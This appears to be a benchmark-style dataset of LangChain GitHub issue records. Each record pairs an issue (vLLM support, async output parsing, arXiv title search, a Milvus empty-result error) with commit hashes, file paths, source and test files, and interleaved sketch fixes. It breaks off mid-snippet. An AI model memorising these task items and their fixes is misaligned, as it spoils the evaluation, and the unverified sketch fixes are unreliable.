code-block:: python from langchain.chains.openai_functions import create_structured_output_chain from langchain.chat_models import ChatOpenAI from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate from pydantic import BaseModel, Field class Dog(BaseModel): \"\"\"Identifying information about a dog.\"\"\" name: str = Field(..., description="The dog's name") color: str = Field(..., description="The dog's color") fav_food: Optional[str] = Field(None, description="The dog's favorite food") llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0) prompt_msgs = [ SystemMessage( content="You are a world class algorithm for extracting information in structured formats." ), HumanMessage(content="Use the given format to extract information from the following input:"), HumanMessagePromptTemplate.from_template("{input}"), HumanMessage(content="Tips: Make sure to answer in the correct format"), ] prompt = ChatPromptTemplate(messages=prompt_msgs) chain = create_structured_output_chain(Dog, llm, prompt) chain.run("Harry was a chubby brown beagle who loved chicken") # -> Dog(name="Harry", color="brown", fav_food="chicken") """ # noqa: E501 if isinstance(output_schema, dict): function: Any = { "name": "output_formatter", "description": ( "Output formatter. Should always be used to format your response to the" " user." ), "parameters": output_schema, } else: class _OutputFormatter(BaseModel): """Output formatter. Should always be used to format your response to the user.""" # noqa: E501 output: output_schema # type: ignore function = _OutputFormatter output_parser = output_parser or PydanticAttrOutputFunctionsParser( pydantic_schema=_OutputFormatter, attr_name="output" ) return create_openai_fn_chain( [function], llm, prompt, output_parser=output_parser, **kwargs )
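The failure in issue 7616 above traces to `_get_python_function_name`, which calls `inspect.getsource` and regex-matches a `def` line — this breaks for classes and for any callable whose source is unavailable. Following the issue's own suggestion, a sketch of the simpler implementation:

```python
from typing import Callable


def _get_python_function_name(function: Callable) -> str:
    """Get the name of a Python function."""
    # __name__ exists on plain functions and classes alike,
    # and needs no source-code lookup.
    return function.__name__
```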
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,729
VLLM
### Feature request Can we please get vLLM support for faster inference? ### Motivation Faster inference speed compared to using the Hugging Face pipeline. ### Your contribution n/a
https://github.com/langchain-ai/langchain/issues/8729
https://github.com/langchain-ai/langchain/pull/8806
100d9ce4c7b55db0c9df973a26bbc18d5ad5800c
a616e19975796ff6e3cde24597ba90eee714d57a
"2023-08-04T00:45:38Z"
python
"2023-08-07T14:32:02Z"
docs/extras/integrations/llms/vllm.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,729
VLLM
### Feature request Can we please get vLLM support for faster inference? ### Motivation Faster inference speed compared to using the Hugging Face pipeline. ### Your contribution n/a
https://github.com/langchain-ai/langchain/issues/8729
https://github.com/langchain-ai/langchain/pull/8806
100d9ce4c7b55db0c9df973a26bbc18d5ad5800c
a616e19975796ff6e3cde24597ba90eee714d57a
"2023-08-04T00:45:38Z"
python
"2023-08-07T14:32:02Z"
libs/langchain/langchain/llms/__init__.py
""" **LLM** classes provide access to the large language model (**LLM**) APIs and services. **Class hierarchy:** .. code-block:: BaseLanguageModel --> BaseLLM --> LLM --> <name> # Examples: AI21, HuggingFaceHub, OpenAI **Main helpers:** .. code-block:: LLMResult, PromptValue, CallbackManagerForLLMRun, AsyncCallbackManagerForLLMRun, CallbackManager, AsyncCallbackManager, AIMessage, BaseMessage """ # noqa: E501 from typing import Dict, Type from langchain.llms.ai21 import AI21 from langchain.llms.aleph_alpha import AlephAlpha from langchain.llms.amazon_api_gateway import AmazonAPIGateway from langchain.llms.anthropic import Anthropic from langchain.llms.anyscale import Anyscale from langchain.llms.aviary import Aviary from langchain.llms.azureml_endpoint import AzureMLOnlineEndpoint from langchain.llms.bananadev import Banana from langchain.llms.base import BaseLLM from langchain.llms.baseten import Baseten from langchain.llms.beam import Beam from langchain.llms.bedrock import Bedrock from langchain.llms.cerebriumai import CerebriumAI from langchain.llms.chatglm import ChatGLM from langchain.llms.clarifai import Clarifai from langchain.llms.cohere import Cohere from langchain.llms.ctransformers import CTransformers from langchain.llms.databricks import Databricks from langchain.llms.deepinfra import DeepInfra from langchain.llms.edenai import EdenAI from langchain.llms.fake import FakeListLLM from langchain.llms.fireworks import Fireworks, FireworksChat from langchain.llms.forefrontai import ForefrontAI from langchain.llms.google_palm import GooglePalm from langchain.llms.gooseai import GooseAI from langchain.llms.gpt4all import GPT4All from langchain.llms.huggingface_endpoint import HuggingFaceEndpoint from langchain.llms.huggingface_hub import HuggingFaceHub from langchain.llms.huggingface_pipeline import HuggingFacePipeline from langchain.llms.huggingface_text_gen_inference import HuggingFaceTextGenInference from langchain.llms.human import HumanInputLLM from langchain.llms.koboldai import KoboldApiLLM from langchain.llms.llamacpp import LlamaCpp from langchain.llms.manifest import ManifestWrapper from langchain.llms.minimax import Minimax from langchain.llms.mlflow_ai_gateway import MlflowAIGateway from langchain.llms.modal import Modal from langchain.llms.mosaicml import MosaicML from langchain.llms.nlpcloud import NLPCloud from langchain.llms.octoai_endpoint import OctoAIEndpoint from langchain.llms.openai import AzureOpenAI, OpenAI, OpenAIChat from langchain.llms.openllm import OpenLLM from langchain.llms.openlm import OpenLM from langchain.llms.petals import Petals from langchain.llms.pipelineai import PipelineAI from langchain.llms.predibase import Predibase from langchain.llms.predictionguard import PredictionGuard from langchain.llms.promptlayer_openai import PromptLayerOpenAI, PromptLayerOpenAIChat from langchain.llms.replicate import Replicate from langchain.llms.rwkv import RWKV from langchain.llms.sagemaker_endpoint import SagemakerEndpoint from langchain.llms.self_hosted import SelfHostedPipeline from langchain.llms.self_hosted_hugging_face import SelfHostedHuggingFaceLLM from langchain.llms.stochasticai import StochasticAI from langchain.llms.textgen import TextGen from langchain.llms.tongyi import Tongyi from langchain.llms.vertexai import VertexAI from langchain.llms.writer import Writer from langchain.llms.xinference import Xinference __all__ = [ "AI21", "AlephAlpha", "AmazonAPIGateway", "Anthropic", "Anyscale", "Aviary", "AzureMLOnlineEndpoint", "AzureOpenAI", "Banana", 
"Baseten", "Beam", "Bedrock", "CTransformers", "CerebriumAI", "ChatGLM", "Clarifai", "Cohere", "Databricks", "DeepInfra", "EdenAI", "FakeListLLM", "Fireworks", "FireworksChat", "ForefrontAI", "GPT4All", "GooglePalm", "GooseAI", "HuggingFaceEndpoint", "HuggingFaceHub", "HuggingFacePipeline", "HuggingFaceTextGenInference", "HumanInputLLM", "KoboldApiLLM", "LlamaCpp", "TextGen", "ManifestWrapper", "Minimax", "MlflowAIGateway", "Modal", "MosaicML", "NLPCloud", "OpenAI", "OpenAIChat", "OpenLLM", "OpenLM", "Petals", "PipelineAI", "Predibase", "PredictionGuard", "PromptLayerOpenAI", "PromptLayerOpenAIChat", "RWKV", "Replicate", "SagemakerEndpoint", "SelfHostedHuggingFaceLLM", "SelfHostedPipeline", "StochasticAI", "Tongyi", "VertexAI", "Writer", "OctoAIEndpoint", "Xinference", ] type_to_cls_dict: Dict[str, Type[BaseLLM]] = { "ai21": AI21, "aleph_alpha": AlephAlpha, "amazon_api_gateway": AmazonAPIGateway, "amazon_bedrock": Bedrock, "anthropic": Anthropic, "anyscale": Anyscale, "aviary": Aviary, "azure": AzureOpenAI, "azureml_endpoint": AzureMLOnlineEndpoint, "bananadev": Banana, "baseten": Baseten, "beam": Beam, "cerebriumai": CerebriumAI, "chat_glm": ChatGLM, "clarifai": Clarifai, "cohere": Cohere, "ctransformers": CTransformers, "databricks": Databricks, "deepinfra": DeepInfra, "edenai": EdenAI, "fake-list": FakeListLLM, "forefrontai": ForefrontAI, "google_palm": GooglePalm, "gooseai": GooseAI, "gpt4all": GPT4All, "huggingface_endpoint": HuggingFaceEndpoint, "huggingface_hub": HuggingFaceHub, "huggingface_pipeline": HuggingFacePipeline, "huggingface_textgen_inference": HuggingFaceTextGenInference, "human-input": HumanInputLLM, "koboldai": KoboldApiLLM, "llamacpp": LlamaCpp, "textgen": TextGen, "minimax": Minimax, "mlflow-ai-gateway": MlflowAIGateway, "modal": Modal, "mosaic": MosaicML, "nlpcloud": NLPCloud, "openai": OpenAI, "openlm": OpenLM, "petals": Petals, "pipelineai": PipelineAI, "predibase": Predibase, "replicate": Replicate, "rwkv": RWKV, "sagemaker_endpoint": SagemakerEndpoint, "self_hosted": SelfHostedPipeline, "self_hosted_hugging_face": SelfHostedHuggingFaceLLM, "stochasticai": StochasticAI, "tongyi": Tongyi, "vertexai": VertexAI, "openllm": OpenLLM, "openllm_client": OpenLLM, "writer": Writer, "xinference": Xinference, }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,729
VLLM
### Feature request Can we please get vLLM support for faster inference? ### Motivation Faster inference speed compared to using the Hugging Face pipeline. ### Your contribution n/a
https://github.com/langchain-ai/langchain/issues/8729
https://github.com/langchain-ai/langchain/pull/8806
100d9ce4c7b55db0c9df973a26bbc18d5ad5800c
a616e19975796ff6e3cde24597ba90eee714d57a
"2023-08-04T00:45:38Z"
python
"2023-08-07T14:32:02Z"
libs/langchain/langchain/llms/vllm.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,989
OutputFixingParser is not async
### System Info LangChain Python v0.0.237 Based on this code snippet it appears that OutputFixingParser doesn't support async flows. https://github.com/hwchase17/langchain/blob/df84e1bb64d96377f909651f696f310c43c2f2c5/langchain/output_parsers/fix.py#L46-L52 It's calling the run function and not arun ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction 1. Define async callback handler 2. Make LLM return output that is unparsable (invalid JSON or 2 code blocks) 3. OutputFixingParser will fail parsing the output and throw an exception, which will call the LLM via the run function which doesn't await on coroutines. Python will give the following error: ``` RuntimeWarning: coroutine 'AsyncCallbackHandler.on_chat_model_start' was never awaited ``` ### Expected behavior 1. Should work with coroutines as expected
https://github.com/langchain-ai/langchain/issues/7989
https://github.com/langchain-ai/langchain/pull/8776
cc908d49a3c23e128fab7c89fa45d7cc4114f028
33cdb06b5c9d4d3e7f54d5e1e7c980dfae33923b
"2023-07-20T08:29:12Z"
python
"2023-08-07T21:42:48Z"
libs/langchain/langchain/output_parsers/fix.py
from __future__ import annotations from typing import TypeVar from langchain.chains.llm import LLMChain from langchain.output_parsers.prompts import NAIVE_FIX_PROMPT from langchain.schema import BaseOutputParser, BasePromptTemplate, OutputParserException from langchain.schema.language_model import BaseLanguageModel T = TypeVar("T") class OutputFixingParser(BaseOutputParser[T]): """Wraps a parser and tries to fix parsing errors.""" @property def lc_serializable(self) -> bool: return True parser: BaseOutputParser[T] retry_chain: LLMChain @classmethod def from_llm( cls, llm: BaseLanguageModel, parser: BaseOutputParser[T], prompt: BasePromptTemplate = NAIVE_FIX_PROMPT, ) -> OutputFixingParser[T]: """Create an OutputFixingParser from a language model and a parser. Args: llm: llm to use for fixing parser: parser to use for parsing prompt: prompt to use for fixing Returns: OutputFixingParser """ chain = LLMChain(llm=llm, prompt=prompt) return cls(parser=parser, retry_chain=chain) def parse(self, completion: str) -> T: try: parsed_completion = self.parser.parse(completion) except OutputParserException as e: new_completion = self.retry_chain.run( instructions=self.parser.get_format_instructions(), completion=completion, error=repr(e), ) parsed_completion = self.parser.parse(new_completion) return parsed_completion def get_format_instructions(self) -> str: return self.parser.get_format_instructions() @property def _type(self) -> str: return "output_fixing"
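The parser above only implements the synchronous path, which is exactly what issue 7989 reports. A sketch of what an async counterpart could look like — mirroring `parse` but awaiting `arun`; the subclass and method names here are assumptions, not the merged fix:

```python
from langchain.output_parsers.fix import OutputFixingParser
from langchain.schema import OutputParserException


class AsyncOutputFixingParser(OutputFixingParser):
    """Sketch: add an async entry point so coroutine callbacks are awaited."""

    async def aparse(self, completion):
        try:
            return self.parser.parse(completion)
        except OutputParserException as e:
            # arun awaits the chain, so async callback handlers fire correctly.
            new_completion = await self.retry_chain.arun(
                instructions=self.parser.get_format_instructions(),
                completion=completion,
                error=repr(e),
            )
            return self.parser.parse(new_completion)
```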
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,989
OutputFixingParser is not async
### System Info LangChain Python v0.0.237 Based on this code snippet it appears that OutputFixingParser doesn't support async flows. https://github.com/hwchase17/langchain/blob/df84e1bb64d96377f909651f696f310c43c2f2c5/langchain/output_parsers/fix.py#L46-L52 It's calling the run function and not arun ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction 1. Define async callback handler 2. Make LLM return output that is unparsable (invalid JSON or 2 code blocks) 3. OutputFixingParser will fail parsing the output and throw an exception, which will call the LLM via the run function which doesn't await on coroutines. Python will give the following error: ``` RuntimeWarning: coroutine 'AsyncCallbackHandler.on_chat_model_start' was never awaited ``` ### Expected behavior 1. Should work with coroutines as expected
https://github.com/langchain-ai/langchain/issues/7989
https://github.com/langchain-ai/langchain/pull/8776
cc908d49a3c23e128fab7c89fa45d7cc4114f028
33cdb06b5c9d4d3e7f54d5e1e7c980dfae33923b
"2023-07-20T08:29:12Z"
python
"2023-08-07T21:42:48Z"
libs/langchain/langchain/output_parsers/retry.py
from __future__ import annotations from typing import TypeVar from langchain.chains.llm import LLMChain from langchain.prompts.prompt import PromptTemplate from langchain.schema import ( BaseOutputParser, BasePromptTemplate, OutputParserException, PromptValue, ) from langchain.schema.language_model import BaseLanguageModel NAIVE_COMPLETION_RETRY = """Prompt: {prompt} Completion: {completion} Above, the Completion did not satisfy the constraints given in the Prompt. Please try again:""" NAIVE_COMPLETION_RETRY_WITH_ERROR = """Prompt: {prompt} Completion: {completion} Above, the Completion did not satisfy the constraints given in the Prompt. Details: {error} Please try again:""" NAIVE_RETRY_PROMPT = PromptTemplate.from_template(NAIVE_COMPLETION_RETRY) NAIVE_RETRY_WITH_ERROR_PROMPT = PromptTemplate.from_template( NAIVE_COMPLETION_RETRY_WITH_ERROR ) T = TypeVar("T") class RetryOutputParser(BaseOutputParser[T]): """Wraps a parser and tries to fix parsing errors. Does this by passing the original prompt and the completion to another LLM, and telling it the completion did not satisfy criteria in the prompt. """ parser: BaseOutputParser[T] """The parser to use to parse the output.""" retry_chain: LLMChain """The LLMChain to use to retry the completion.""" @classmethod def from_llm( cls, llm: BaseLanguageModel, parser: BaseOutputParser[T], prompt: BasePromptTemplate = NAIVE_RETRY_PROMPT, ) -> RetryOutputParser[T]: chain = LLMChain(llm=llm, prompt=prompt) return cls(parser=parser, retry_chain=chain) def parse_with_prompt(self, completion: str, prompt_value: PromptValue) -> T: """Parse the output of an LLM call using a wrapped parser. Args: completion: The chain completion to parse. prompt_value: The prompt to use to parse the completion. Returns: The parsed completion. """ try: parsed_completion = self.parser.parse(completion) except OutputParserException: new_completion = self.retry_chain.run( prompt=prompt_value.to_string(), completion=completion ) parsed_completion = self.parser.parse(new_completion) return parsed_completion def parse(self, completion: str) -> T: raise NotImplementedError( "This OutputParser can only be called by the `parse_with_prompt` method." ) def get_format_instructions(self) -> str: return self.parser.get_format_instructions() @property def _type(self) -> str: return "retry" class RetryWithErrorOutputParser(BaseOutputParser[T]): """Wraps a parser and tries to fix parsing errors. Does this by passing the original prompt, the completion, AND the error that was raised to another language model and telling it that the completion did not work, and raised the given error. Differs from RetryOutputParser in that this implementation provides the error that was raised back to the LLM, which in theory should give it more information on how to fix it. """ parser: BaseOutputParser[T] retry_chain: LLMChain @classmethod def from_llm( cls, llm: BaseLanguageModel, parser: BaseOutputParser[T], prompt: BasePromptTemplate = NAIVE_RETRY_WITH_ERROR_PROMPT, ) -> RetryWithErrorOutputParser[T]: """Create a RetryWithErrorOutputParser from an LLM. Args: llm: The LLM to use to retry the completion. parser: The parser to use to parse the output. prompt: The prompt to use to retry the completion. Returns: A RetryWithErrorOutputParser. 
""" chain = LLMChain(llm=llm, prompt=prompt) return cls(parser=parser, retry_chain=chain) def parse_with_prompt(self, completion: str, prompt_value: PromptValue) -> T: try: parsed_completion = self.parser.parse(completion) except OutputParserException as e: new_completion = self.retry_chain.run( prompt=prompt_value.to_string(), completion=completion, error=repr(e) ) parsed_completion = self.parser.parse(new_completion) return parsed_completion def parse(self, completion: str) -> T: raise NotImplementedError( "This OutputParser can only be called by the `parse_with_prompt` method." ) def get_format_instructions(self) -> str: return self.parser.get_format_instructions() @property def _type(self) -> str: return "retry_with_error"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,046
ArxivLoader incorrect results
### System Info Latest pip versions ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I tried searching by exact title in the following way: ```python docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load() ``` But the result is incorrect. The search works properly on the arxiv website. ### Expected behavior Correct paper returned
https://github.com/langchain-ai/langchain/issues/9046
https://github.com/langchain-ai/langchain/pull/9061
e94a5d753fe01aff1fa1592cd59d37fa64ef24a2
fcbbddedaed196b0aa0377ca8c78b3410f62420f
"2023-08-10T15:18:24Z"
python
"2023-08-10T18:59:39Z"
libs/langchain/langchain/utilities/arxiv.py
"""Util that calls Arxiv.""" import logging import os from typing import Any, Dict, List, Optional from pydantic import BaseModel, root_validator from langchain.schema import Document logger = logging.getLogger(__name__) class ArxivAPIWrapper(BaseModel): """Wrapper around ArxivAPI. To use, you should have the ``arxiv`` python package installed. https://lukasschwab.me/arxiv.py/index.html This wrapper will use the Arxiv API to conduct searches and fetch document summaries. By default, it will return the document summaries of the top-k results. It limits the Document content by doc_content_chars_max. Set doc_content_chars_max=None if you don't want to limit the content size. Attributes: top_k_results: number of the top-scored document used for the arxiv tool ARXIV_MAX_QUERY_LENGTH: the cut limit on the query used for the arxiv tool. load_max_docs: a limit to the number of loaded documents load_all_available_meta: if True: the `metadata` of the loaded Documents contains all available meta info (see https://lukasschwab.me/arxiv.py/index.html#Result), if False: the `metadata` contains only the published date, title, authors and summary. doc_content_chars_max: an optional cut limit for the length of a document's content Example: .. code-block:: python from langchain.utilities.arxiv import ArxivAPIWrapper arxiv = ArxivAPIWrapper( top_k_results = 3, ARXIV_MAX_QUERY_LENGTH = 300, load_max_docs = 3, load_all_available_meta = False, doc_content_chars_max = 40000 ) arxiv.run("tree of thought llm) """ arxiv_search: Any #: :meta private: arxiv_exceptions: Any # :meta private: top_k_results: int = 3 ARXIV_MAX_QUERY_LENGTH = 300 load_max_docs: int = 100 load_all_available_meta: bool = False doc_content_chars_max: Optional[int] = 4000 @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that the python package exists in environment.""" try: import arxiv values["arxiv_search"] = arxiv.Search values["arxiv_exceptions"] = ( arxiv.ArxivError, arxiv.UnexpectedEmptyPageError, arxiv.HTTPError, ) values["arxiv_result"] = arxiv.Result except ImportError: raise ImportError( "Could not import arxiv python package. " "Please install it with `pip install arxiv`." ) return values def run(self, query: str) -> str: """ Performs an arxiv search and A single string with the publish date, title, authors, and summary for each article separated by two newlines. If an error occurs or no documents found, error text is returned instead. Wrapper for https://lukasschwab.me/arxiv.py/index.html#Search Args: query: a plaintext search query """ # noqa: E501 try: results = self.arxiv_search( # type: ignore query[: self.ARXIV_MAX_QUERY_LENGTH], max_results=self.top_k_results ).results() except self.arxiv_exceptions as ex: return f"Arxiv exception: {ex}" docs = [ f"Published: {result.updated.date()}\n" f"Title: {result.title}\n" f"Authors: {', '.join(a.name for a in result.authors)}\n" f"Summary: {result.summary}" for result in results ] if docs: return "\n\n".join(docs)[: self.doc_content_chars_max] else: return "No good Arxiv Result was found" def load(self, query: str) -> List[Document]: """ Run Arxiv search and get the article texts plus the article meta information. See https://lukasschwab.me/arxiv.py/index.html#Search Returns: a list of documents with the document.page_content in text format Performs an arxiv search, downloads the top k results as PDFs, loads them as Documents, and returns them in a List. 
Args: query: a plaintext search query """ # noqa: E501 try: import fitz except ImportError: raise ImportError( "PyMuPDF package not found, please install it with " "`pip install pymupdf`" ) try: results = self.arxiv_search( # type: ignore query[: self.ARXIV_MAX_QUERY_LENGTH], max_results=self.load_max_docs ).results() except self.arxiv_exceptions as ex: logger.debug("Error on arxiv: %s", ex) return [] docs: List[Document] = [] for result in results: try: doc_file_name: str = result.download_pdf() with fitz.open(doc_file_name) as doc_file: text: str = "".join(page.get_text() for page in doc_file) except FileNotFoundError as f_ex: logger.debug(f_ex) continue if self.load_all_available_meta: extra_metadata = { "entry_id": result.entry_id, "published_first_time": str(result.published.date()), "comment": result.comment, "journal_ref": result.journal_ref, "doi": result.doi, "primary_category": result.primary_category, "categories": result.categories, "links": [link.href for link in result.links], } else: extra_metadata = {} metadata = { "Published": str(result.updated.date()), "Title": result.title, "Authors": ", ".join(a.name for a in result.authors), "Summary": result.summary, **extra_metadata, } doc = Document( page_content=text[: self.doc_content_chars_max], metadata=metadata ) docs.append(doc) os.remove(doc_file_name) return docs
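The title query in issue 9046 fails because `run`/`load` above pass the raw string straight into `arxiv.Search`, whose query parser treats it differently than the website's search box. One workaround — a sketch using the arXiv API's fielded, quoted-phrase syntax, with a helper name of my own; this is not necessarily what the merged fix does:

```python
from langchain.utilities import ArxivAPIWrapper


def load_by_exact_title(title: str, **kwargs):
    """Workaround sketch: query the arXiv 'ti:' field with the title quoted."""
    wrapper = ArxivAPIWrapper(**kwargs)
    return wrapper.load(f'ti:"{title}"')


docs = load_by_exact_title(
    "MetaGPT: Meta Programming for Multi-Agent Collaborative Framework",
    load_max_docs=1,
)
```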
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,046
ArxivLoader incorrect results
### System Info Latest pip versions ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I tried searching by exact title in the following way: ```python docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load() ``` But the result is incorrect. The search works properly on the arxiv website. ### Expected behavior Correct paper returned
https://github.com/langchain-ai/langchain/issues/9046
https://github.com/langchain-ai/langchain/pull/9061
e94a5d753fe01aff1fa1592cd59d37fa64ef24a2
fcbbddedaed196b0aa0377ca8c78b3410f62420f
"2023-08-10T15:18:24Z"
python
"2023-08-10T18:59:39Z"
libs/langchain/tests/integration_tests/document_loaders/test_arxiv.py
from typing import List from langchain.document_loaders.arxiv import ArxivLoader from langchain.schema import Document def assert_docs(docs: List[Document]) -> None: for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata) == {"Published", "Title", "Authors", "Summary"} def test_load_success() -> None: """Test that returns one document""" loader = ArxivLoader(query="1605.08386", load_max_docs=2) docs = loader.load() assert len(docs) == 1 print(docs[0].metadata) print(docs[0].page_content) assert_docs(docs) def test_load_returns_no_result() -> None: """Test that returns no docs""" loader = ArxivLoader(query="1605.08386WWW", load_max_docs=2) docs = loader.load() assert len(docs) == 0 def test_load_returns_limited_docs() -> None: """Test that returns several docs""" expected_docs = 2 loader = ArxivLoader(query="ChatGPT", load_max_docs=expected_docs) docs = loader.load() assert len(docs) == expected_docs assert_docs(docs) def test_load_returns_full_set_of_metadata() -> None: """Test that returns several docs""" loader = ArxivLoader(query="ChatGPT", load_max_docs=1, load_all_available_meta=True) docs = loader.load() assert len(docs) == 1 for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata).issuperset( {"Published", "Title", "Authors", "Summary"} ) print(doc.metadata) assert len(set(doc.metadata)) > 4
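A regression test for the exact-title behavior from issue 9046 could sit alongside the tests above; the test below is a sketch that reuses the module's `assert_docs` helper, not an existing test from the suite:

```python
def test_load_success_by_title() -> None:
    """Exact-title queries should return the matching paper (sketch)."""
    title = "MetaGPT: Meta Programming for Multi-Agent Collaborative Framework"
    loader = ArxivLoader(query=title, load_max_docs=1)
    docs = loader.load()
    assert len(docs) == 1
    assert docs[0].metadata["Title"] == title
    assert_docs(docs)
```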
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,046
ArxivLoader incorrect results
### System Info Latest pip versions ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I tried searching by exact title in the following way: ```python docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load() ``` But the result is incorrect. The search works properly on the arxiv website. ### Expected behavior Correct paper returned
https://github.com/langchain-ai/langchain/issues/9046
https://github.com/langchain-ai/langchain/pull/9061
e94a5d753fe01aff1fa1592cd59d37fa64ef24a2
fcbbddedaed196b0aa0377ca8c78b3410f62420f
"2023-08-10T15:18:24Z"
python
"2023-08-10T18:59:39Z"
libs/langchain/tests/integration_tests/utilities/test_arxiv.py
"""Integration test for Arxiv API Wrapper.""" from typing import Any, List import pytest from langchain.agents.load_tools import load_tools from langchain.schema import Document from langchain.tools.base import BaseTool from langchain.utilities import ArxivAPIWrapper @pytest.fixture def api_client() -> ArxivAPIWrapper: return ArxivAPIWrapper() def test_run_success(api_client: ArxivAPIWrapper) -> None: """Test that returns the correct answer""" output = api_client.run("1605.08386") assert "Heat-bath random walks with Markov bases" in output def test_run_returns_several_docs(api_client: ArxivAPIWrapper) -> None: """Test that returns several docs""" output = api_client.run("Caprice Stanley") assert "On Mixing Behavior of a Family of Random Walks" in output def test_run_returns_no_result(api_client: ArxivAPIWrapper) -> None: """Test that gives no result.""" output = api_client.run("1605.08386WWW") assert "No good Arxiv Result was found" == output def assert_docs(docs: List[Document]) -> None: for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata) == {"Published", "Title", "Authors", "Summary"} def test_load_success(api_client: ArxivAPIWrapper) -> None: """Test that returns one document""" docs = api_client.load("1605.08386") assert len(docs) == 1 assert_docs(docs) def test_load_returns_no_result(api_client: ArxivAPIWrapper) -> None: """Test that returns no docs""" docs = api_client.load("1605.08386WWW") assert len(docs) == 0 def test_load_returns_limited_docs() -> None: """Test that returns several docs""" expected_docs = 2 api_client = ArxivAPIWrapper(load_max_docs=expected_docs) docs = api_client.load("ChatGPT") assert len(docs) == expected_docs assert_docs(docs) def test_load_returns_limited_doc_content_chars() -> None: """Test that returns limited doc_content_chars_max""" doc_content_chars_max = 100 api_client = ArxivAPIWrapper(doc_content_chars_max=doc_content_chars_max) docs = api_client.load("1605.08386") assert len(docs[0].page_content) == doc_content_chars_max def test_load_returns_unlimited_doc_content_chars() -> None: """Test that returns unlimited doc_content_chars_max""" doc_content_chars_max = None api_client = ArxivAPIWrapper(doc_content_chars_max=doc_content_chars_max) docs = api_client.load("1605.08386") assert len(docs[0].page_content) == 54337 def test_load_returns_full_set_of_metadata() -> None: """Test that returns several docs""" api_client = ArxivAPIWrapper(load_max_docs=1, load_all_available_meta=True) docs = api_client.load("ChatGPT") assert len(docs) == 1 for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata).issuperset( {"Published", "Title", "Authors", "Summary"} ) print(doc.metadata) assert len(set(doc.metadata)) > 4 def _load_arxiv_from_universal_entry(**kwargs: Any) -> BaseTool: tools = load_tools(["arxiv"], **kwargs) assert len(tools) == 1, "loaded more than 1 tool" return tools[0] def test_load_arxiv_from_universal_entry() -> None: arxiv_tool = _load_arxiv_from_universal_entry() output = arxiv_tool("Caprice Stanley") assert ( "On Mixing Behavior of a Family of Random Walks" in output ), "failed to fetch a valid result" def test_load_arxiv_from_universal_entry_with_params() -> None: params = { "top_k_results": 1, "load_max_docs": 10, "load_all_available_meta": True, } arxiv_tool = _load_arxiv_from_universal_entry(**params) assert isinstance(arxiv_tool, ArxivAPIWrapper) wp = arxiv_tool.api_wrapper assert wp.top_k_results == 1, "failed to assert top_k_results" assert wp.load_max_docs == 10, "failed to 
assert load_max_docs" assert ( wp.load_all_available_meta is True ), "failed to assert load_all_available_meta"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
1,733
list index out of range error if similarity search gives 0 docs
https://github.com/hwchase17/langchain/blob/276940fd9babf8aec570dd869cc84fbca1c766bf/langchain/vectorstores/milvus.py#L319 I'm using Milvus, and for my question the similarity search returns 0 documents, so an index-out-of-range error occurs. Error line: https://github.com/hwchase17/langchain/blob/276940fd9babf8aec570dd869cc84fbca1c766bf/langchain/chains/llm.py#L95
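A minimal sketch of how an empty retrieval result reaches the failing line — the fake LLM and template are illustrative:

```python
from langchain.chains import LLMChain
from langchain.llms.fake import FakeListLLM
from langchain.prompts import PromptTemplate

chain = LLMChain(
    llm=FakeListLLM(responses=["unused"]),
    prompt=PromptTemplate.from_template("Answer using: {context}"),
)

# Zero retrieved documents mean zero inputs for the map step:
docs = []  # what similarity_search returned for the question
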